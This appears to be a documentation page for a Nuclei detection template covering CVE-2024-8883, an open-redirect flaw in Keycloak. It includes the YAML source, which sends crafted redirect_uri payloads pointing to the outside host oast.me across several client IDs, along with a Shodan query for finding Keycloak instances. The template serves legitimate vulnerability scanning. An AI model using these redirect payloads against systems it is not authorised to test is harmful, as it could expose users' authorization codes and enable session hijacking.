Skip to content
Nuclei Templates

Keycloak - Open Redirect

ID: CVE-2024-8883

Severity: medium

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,keycloak,redirect

Description

Section titled “Description”

A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a ‘Valid Redirect URI’ is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.

YAML Source

Section titled “YAML Source”
id: CVE-2024-8883


info:
  name: Keycloak - Open Redirect
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.
  reference:
    - https://github.com/advisories/GHSA-vvf8-2h68-9475
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8883
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
    cvss-score: 6.8
    cve-id: CVE-2024-8883
    cwe-id: CWE-601
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"keycloak"
  tags: cve,cve2024,keycloak,redirect


variables:
  redirect_uri: "oast.me"


http:
  - raw:
      - |
        GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1
        Host: {{Hostname}}


    payloads:
      redir_host:
        - http://localhost
        - http://127.0.0.1
        - https://localhost
        - https://127.0.0.1
        - http://[::]
        - https://[::]


      client_id:
        - security-admin-console
        - master-realm
        - broker
        - admin-cli
        - account
        - account-console


    attack: clusterbomb


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - 'Location:\s+https?://(localhost|127.0.0.1|\[::\]):\d*@oast\.me\?'


      - type: status
        status:
          - 302
# digest: 4a0a00473045022070d8ba718d3ab5cc4cc52b6aa25c0bb56097ccaba870e31fa347fd53691c1fc0022100fac09f199b98cac6fd238bc8385ff20ded091465ad135fb7f5f49d6b1bfbf3ad:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8883.yaml"

View on Github